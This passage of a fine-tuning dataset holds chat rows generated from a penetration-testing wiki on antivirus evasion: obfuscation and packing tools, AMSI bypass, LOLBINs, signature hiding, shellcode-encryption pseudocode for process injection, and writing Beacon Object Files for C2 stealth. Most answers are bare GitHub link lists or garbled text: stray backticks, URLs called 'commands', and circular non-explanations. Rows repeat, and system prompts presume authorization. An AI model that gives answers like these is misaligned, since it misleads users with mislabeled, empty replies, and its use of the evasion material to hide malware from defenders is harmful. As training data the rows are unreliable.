mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Obfuscation - Automatic obfuscation in the context of penetration testing"}, {"role": "assistant", "content": "Depending on your needs, you can use tools available for the most part on github, they are sorted by category below.\n\n:information_source: You can also find all the tools in the mindmap section."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Obfuscation - Automatic obfuscation in the context of penetration testing", "response": "Depending on your needs, you can use tools available for the most part on github, they are sorted by category below.\n\n:information_source: You can also find all the tools in the mindmap section.", "metadata": {"corpus_index": 1365, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Obfuscation - Automatic obfuscation"}, {"role": "assistant", "content": "Depending on your needs, you can use tools available for the most part on github, they are sorted by category below.\n\n:information_source: You can also find all the tools in the mindmap section."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Obfuscation - Automatic obfuscation", "response": "Depending on your needs, you can use tools available for the most part on github, they are sorted by category below.\n\n:information_source: You can also find all the tools in the mindmap section.", "metadata": {"corpus_index": 1365, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Obfuscation - Packing?"}, {"role": "assistant", "content": "```\n- https://github.com/phra/PEzor\n- https://github.com/klezVirus/inceptor\n- https://github.com/govolution/avet\n- https://github.com/Nariod/RustPacker\n- https://github.com/DavidBuchanan314/monomorph\n- https://github.com/upx/upx"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Obfuscation - Packing?", "response": "```\n- https://github.com/phra/PEzor\n- https://github.com/klezVirus/inceptor\n- https://github.com/govolution/avet\n- https://github.com/Nariod/RustPacker\n- https://github.com/DavidBuchanan314/monomorph\n- https://github.com/upx/upx", "metadata": {"corpus_index": 1366, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Obfuscation - Packing"}, {"role": "assistant", "content": "```\n- https://github.com/phra/PEzor\n- https://github.com/klezVirus/inceptor\n- https://github.com/govolution/avet\n- https://github.com/Nariod/RustPacker\n- https://github.com/DavidBuchanan314/monomorph\n- https://github.com/upx/upx"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Obfuscation - Packing", "response": "```\n- https://github.com/phra/PEzor\n- https://github.com/klezVirus/inceptor\n- https://github.com/govolution/avet\n- https://github.com/Nariod/RustPacker\n- https://github.com/DavidBuchanan314/monomorph\n- https://github.com/upx/upx", "metadata": {"corpus_index": 1366, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Obfuscation - Office macro"}, {"role": "assistant", "content": "- https://github.com/sevagas/macro_pack\n- https://github.com/optiv/Ivy\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Obfuscation - Office macro", "response": "- https://github.com/sevagas/macro_pack\n- https://github.com/optiv/Ivy\n```", "metadata": {"corpus_index": 1367, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Obfuscation - Office macro?"}, {"role": "assistant", "content": "- https://github.com/sevagas/macro_pack\n- https://github.com/optiv/Ivy\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Obfuscation - Office macro?", "response": "- https://github.com/sevagas/macro_pack\n- https://github.com/optiv/Ivy\n```", "metadata": {"corpus_index": 1367, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Obfuscation - AMSI Bypass in the context of penetration testing"}, {"role": "assistant", "content": "``\n- https://github.com/CCob/SharpBlock\n- https://github.com/danielbohannon/Invoke-Obfuscation\n- https://github.com/klezVirus/Chameleon\n- https://github.com/tokyoneon/Chimera\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Obfuscation - AMSI Bypass in the context of penetration testing", "response": "``\n- https://github.com/CCob/SharpBlock\n- https://github.com/danielbohannon/Invoke-Obfuscation\n- https://github.com/klezVirus/Chameleon\n- https://github.com/tokyoneon/Chimera\n``", "metadata": {"corpus_index": 1368, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Obfuscation - AMSI Bypass"}, {"role": "assistant", "content": "``\n- https://github.com/CCob/SharpBlock\n- https://github.com/danielbohannon/Invoke-Obfuscation\n- https://github.com/klezVirus/Chameleon\n- https://github.com/tokyoneon/Chimera\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Obfuscation - AMSI Bypass", "response": "``\n- https://github.com/CCob/SharpBlock\n- https://github.com/danielbohannon/Invoke-Obfuscation\n- https://github.com/klezVirus/Chameleon\n- https://github.com/tokyoneon/Chimera\n``", "metadata": {"corpus_index": 1368, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Obfuscation - AMSI Bypass"}, {"role": "assistant", "content": "- https://github.com/CCob/SharpBlock\n- https://github.com/danielbohannon/Invoke-Obfuscation\n- https://github.com/klezVirus/Chameleon\n- https://github.com/tokyoneon/Chimera"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Obfuscation - AMSI Bypass", "response": "- https://github.com/CCob/SharpBlock\n- https://github.com/danielbohannon/Invoke-Obfuscation\n- https://github.com/klezVirus/Chameleon\n- https://github.com/tokyoneon/Chimera", "metadata": {"corpus_index": 1369, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `- https://github.com/CCob/SharpBlock`?"}, {"role": "assistant", "content": "This command is used for 🛠️ obfuscation - amsi bypass. AMSI Bypass"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `- https://github.com/CCob/SharpBlock`?", "response": "This command is used for 🛠️ obfuscation - amsi bypass. AMSI Bypass", "metadata": {"corpus_index": 1369, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Obfuscation - LOLBIN work?"}, {"role": "assistant", "content": "``\n RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Obfuscation - LOLBIN work?", "response": "``\n RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb\n``", "metadata": {"corpus_index": 1370, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Obfuscation - LOLBIN?"}, {"role": "assistant", "content": "``\n RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Obfuscation - LOLBIN?", "response": "``\n RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb\n``", "metadata": {"corpus_index": 1370, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the RemComSvc command to 🛠️ obfuscation - lolbin"}, {"role": "assistant", "content": "RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the RemComSvc command to 🛠️ obfuscation - lolbin", "response": "RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb", "metadata": {"corpus_index": 1371, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "RemComSvc"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Obfuscation - LOLBIN?"}, {"role": "assistant", "content": "RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Obfuscation - LOLBIN?", "response": "RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb", "metadata": {"corpus_index": 1371, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb`?"}, {"role": "assistant", "content": "This command is used for 🛠️ obfuscation - lolbin. LOLBIN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `RemComSvc - https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb`?", "response": "This command is used for 🛠️ obfuscation - lolbin. LOLBIN", "metadata": {"corpus_index": 1371, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Obfuscation - Signature hiding in the context of penetration testing"}, {"role": "assistant", "content": "``\n- https://github.com/optiv/ScareCrow\n- https://github.com/paranoidninja/CarbonCopy\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Obfuscation - Signature hiding in the context of penetration testing", "response": "``\n- https://github.com/optiv/ScareCrow\n- https://github.com/paranoidninja/CarbonCopy\n``", "metadata": {"corpus_index": 1372, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Obfuscation - Signature hiding"}, {"role": "assistant", "content": "``\n- https://github.com/optiv/ScareCrow\n- https://github.com/paranoidninja/CarbonCopy\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Obfuscation - Signature hiding", "response": "``\n- https://github.com/optiv/ScareCrow\n- https://github.com/paranoidninja/CarbonCopy\n``", "metadata": {"corpus_index": 1372, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Obfuscation - Signature hiding"}, {"role": "assistant", "content": "- https://github.com/optiv/ScareCrow\n- https://github.com/paranoidninja/CarbonCopy"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Obfuscation - Signature hiding", "response": "- https://github.com/optiv/ScareCrow\n- https://github.com/paranoidninja/CarbonCopy", "metadata": {"corpus_index": 1373, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `- https://github.com/optiv/ScareCrow`?"}, {"role": "assistant", "content": "This command is used for 🛠️ obfuscation - signature hiding. Signature hiding"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `- https://github.com/optiv/ScareCrow`?", "response": "This command is used for 🛠️ obfuscation - signature hiding. Signature hiding", "metadata": {"corpus_index": 1373, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Process injection - Theory work?"}, {"role": "assistant", "content": "Instead of simply executing the shellcode, it has become common to find tricks to hide its active load. The classic schema looks like this:\n\n``\n// encrypt the shellcode \n encrypt(ciphered, SHELLCODE, SHELLCODE_LENGTH, KEY);\n// decrypt + handoff \n decrypt(deciphered, ciphered, SHELLCODE_LENGTH, KEY); \n handoff(deciphered, SHELLCODE_LENGTH);\n\n``\n\n> After the malicious code is injected into a legitimate process, attackers also can access legitimate processes' resources such as process memory, system/network resources, and elevated privileges \n>\n> picussecurity.com"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Process injection - Theory work?", "response": "Instead of simply executing the shellcode, it has become common to find tricks to hide its active load. The classic schema looks like this:\n\n``\n// encrypt the shellcode \n encrypt(ciphered, SHELLCODE, SHELLCODE_LENGTH, KEY);\n// decrypt + handoff \n decrypt(deciphered, ciphered, SHELLCODE_LENGTH, KEY); \n handoff(deciphered, SHELLCODE_LENGTH);\n\n``\n\n> After the malicious code is injected into a legitimate process, attackers also can access legitimate processes' resources such as process memory, system/network resources, and elevated privileges \n>\n> picussecurity.com", "metadata": {"corpus_index": 1374, "category": "crypto", "source_file": "docs/src/evasion/av/process-injection.md", "page_title": "🛠️ Process injection", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Process injection - Theory"}, {"role": "assistant", "content": "Instead of simply executing the shellcode, it has become common to find tricks to hide its active load. The classic schema looks like this:\n\n``\n// encrypt the shellcode \n encrypt(ciphered, SHELLCODE, SHELLCODE_LENGTH, KEY);\n// decrypt + handoff \n decrypt(deciphered, ciphered, SHELLCODE_LENGTH, KEY); \n handoff(deciphered, SHELLCODE_LENGTH);\n\n``\n\n> After the malicious code is injected into a legitimate process, attackers also can access legitimate processes' resources such as process memory, system/network resources, and elevated privileges \n>\n> picussecurity.com"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Process injection - Theory", "response": "Instead of simply executing the shellcode, it has become common to find tricks to hide its active load. The classic schema looks like this:\n\n``\n// encrypt the shellcode \n encrypt(ciphered, SHELLCODE, SHELLCODE_LENGTH, KEY);\n// decrypt + handoff \n decrypt(deciphered, ciphered, SHELLCODE_LENGTH, KEY); \n handoff(deciphered, SHELLCODE_LENGTH);\n\n``\n\n> After the malicious code is injected into a legitimate process, attackers also can access legitimate processes' resources such as process memory, system/network resources, and elevated privileges \n>\n> picussecurity.com", "metadata": {"corpus_index": 1374, "category": "crypto", "source_file": "docs/src/evasion/av/process-injection.md", "page_title": "🛠️ Process injection", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Process injection - Theory"}, {"role": "assistant", "content": "// encrypt the shellcode \n encrypt(ciphered, SHELLCODE, SHELLCODE_LENGTH, KEY);\n// decrypt + handoff \n decrypt(deciphered, ciphered, SHELLCODE_LENGTH, KEY); \n handoff(deciphered, SHELLCODE_LENGTH);"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Process injection - Theory", "response": "// encrypt the shellcode \n encrypt(ciphered, SHELLCODE, SHELLCODE_LENGTH, KEY);\n// decrypt + handoff \n decrypt(deciphered, ciphered, SHELLCODE_LENGTH, KEY); \n handoff(deciphered, SHELLCODE_LENGTH);", "metadata": {"corpus_index": 1375, "category": "crypto", "source_file": "docs/src/evasion/av/process-injection.md", "page_title": "🛠️ Process injection", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `// encrypt the shellcode`?"}, {"role": "assistant", "content": "This command is used for 🛠️ process injection - theory. Theory"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `// encrypt the shellcode`?", "response": "This command is used for 🛠️ process injection - theory. Theory", "metadata": {"corpus_index": 1375, "category": "crypto", "source_file": "docs/src/evasion/av/process-injection.md", "page_title": "🛠️ Process injection", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Process injection - Practice?"}, {"role": "assistant", "content": "Process injection exists in many forms, often based on legitimate services.\n\nThe techniques mainly used are : \n\n* Process Doppelganging\n* Dll injection\n* CRT"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Process injection - Practice?", "response": "Process injection exists in many forms, often based on legitimate services.\n\nThe techniques mainly used are : \n\n* Process Doppelganging\n* Dll injection\n* CRT", "metadata": {"corpus_index": 1376, "category": "crypto", "source_file": "docs/src/evasion/av/process-injection.md", "page_title": "🛠️ Process injection", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Process injection - Practice"}, {"role": "assistant", "content": "Process injection exists in many forms, often based on legitimate services.\n\nThe techniques mainly used are : \n\n* Process Doppelganging\n* Dll injection\n* CRT"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Process injection - Practice", "response": "Process injection exists in many forms, often based on legitimate services.\n\nThe techniques mainly used are : \n\n* Process Doppelganging\n* Dll injection\n* CRT", "metadata": {"corpus_index": 1376, "category": "crypto", "source_file": "docs/src/evasion/av/process-injection.md", "page_title": "🛠️ Process injection", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Stealth with C2 - Cobalt / Havoc"}, {"role": "assistant", "content": "once you have a shell on the victim, one of the most discreet ways to execute code is through object file because the idea is to avoid creating a sub-process but rather to allocate memory to run code and then resume its initial size."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Stealth with C2 - Cobalt / Havoc", "response": "once you have a shell on the victim, one of the most discreet ways to execute code is through object file because the idea is to avoid creating a sub-process but rather to allocate memory to run code and then resume its initial size.", "metadata": {"corpus_index": 1377, "category": "persistence", "source_file": "docs/src/evasion/av/stealth.md", "page_title": "🛠️ Stealth with C2", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Stealth with C2 - Cobalt / Havoc"}, {"role": "assistant", "content": "once you have a shell on the victim, one of the most discreet ways to execute code is through object file because the idea is to avoid creating a sub-process but rather to allocate memory to run code and then resume its initial size."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Stealth with C2 - Cobalt / Havoc", "response": "once you have a shell on the victim, one of the most discreet ways to execute code is through object file because the idea is to avoid creating a sub-process but rather to allocate memory to run code and then resume its initial size.", "metadata": {"corpus_index": 1377, "category": "persistence", "source_file": "docs/src/evasion/av/stealth.md", "page_title": "🛠️ Stealth with C2", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Stealth with C2 - Object file"}, {"role": "assistant", "content": "Here is an example of how to launch the BoF (Beacon Object File) once compiled. The source code is available here and the goal is to verify if we are dealing with a virtual machine or not.\n\n![](./assets/bof-VM.png)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Stealth with C2 - Object file", "response": "Here is an example of how to launch the BoF (Beacon Object File) once compiled. The source code is available here and the goal is to verify if we are dealing with a virtual machine or not.\n\n![](./assets/bof-VM.png)", "metadata": {"corpus_index": 1378, "category": "persistence", "source_file": "docs/src/evasion/av/stealth.md", "page_title": "🛠️ Stealth with C2", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Stealth with C2 - Object file"}, {"role": "assistant", "content": "Here is an example of how to launch the BoF (Beacon Object File) once compiled. The source code is available here and the goal is to verify if we are dealing with a virtual machine or not.\n\n![](./assets/bof-VM.png)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Stealth with C2 - Object file", "response": "Here is an example of how to launch the BoF (Beacon Object File) once compiled. The source code is available here and the goal is to verify if we are dealing with a virtual machine or not.\n\n![](./assets/bof-VM.png)", "metadata": {"corpus_index": 1378, "category": "persistence", "source_file": "docs/src/evasion/av/stealth.md", "page_title": "🛠️ Stealth with C2", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Stealth with C2 - How to write BoF (Beacon Object File)?"}, {"role": "assistant", "content": "For example, if you need the RegCloseKey function.\n\nLook at the Windows documentation (in our example https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regclosekey) to get the list of the arguments.\n\nIn our case : \n\n``c\nLSTATUS RegCloseKey(\n [in] HKEY hKey\n);\n`\n\nThen, get the name of the library used (at the bottom of the page) in our case it is : Advapi32.lib\n\nWe have to structure it like this : DECLSPEC_IMPORT LSTATUS WINAPI $();\n\nStill in our case, we will get this: DECLSPEC_IMPORT LSTATUS WINAPI ADVAPI32$RegCloseKey(HKEY);\n\nSimply use the function like this in our code: ADVAPI32$RegCloseKeyA(hKey);\n\n> [!TIP]\n> In addition, to use these functions download the library \"beacon.h\" available here.\n\nIt is also possible to load a library and then call the method using methods like 